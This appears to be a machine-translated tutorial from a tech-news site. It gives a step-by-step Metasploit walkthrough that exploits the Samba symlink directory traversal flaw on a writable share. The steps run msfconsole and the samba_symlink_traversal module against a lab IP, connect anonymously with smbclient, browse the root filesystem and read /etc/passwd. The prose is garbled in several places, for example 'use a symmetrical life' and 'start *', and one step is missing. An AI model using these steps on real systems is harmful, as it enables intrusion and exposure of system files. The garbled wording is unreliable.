Shulou(Shulou.com)06/01 Report--

Samba is a set of programs that implement SMB (server messages block) protocol, cross-platform file sharing and print sharing services. When the sambd of samba is configured for writable file sharing, there is a directory traversal vulnerability. Remote users can use a symmetrical life through the smbclient side to create a file containing. The soft connection of the directory traversal character, you can traverse the directory and access any file.

First, use nmap tools to scan the target host

1.1 scan the target host using the nmap command. Click in the space on the desktop, right-click the menu and choose Open in Terminal.

1.3 enter the command "msfconsole" in the terminal to start the MSF terminal.

1.4 enter the command "search samba" in the terminal to search for samba related tools and * payloads.

1.5 enter the command "use auxiliary/admin/smb/samba_symlink_traversal" in the terminal to enable the exploit module, and the prompt will prompt you to enter the path.

1.6 enter the command "info" in the terminal to view the relevant items that need to be set. "yes" indicates the parameters that must be filled in.

1.7 enter the command "set RHOST 192.168.1.3" in the terminal to set the IP address of the target host.

1.8 enter "set SMBSHARE tmp" in the terminal to set the SAM writable file.

1.9 enter "exploit" in the terminal to start *.

1.10 Open a new terminal, enter "smbclient / / 192.168.1.3/tmp" and enter directly without entering the password.

1.11 enter "cd rootfs" in the terminal, enter the rootfs directory, enter the command "ls" under the terminal, and list the directory.

Type "more / etc/passwd" in the terminal to view the password on the target host system.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.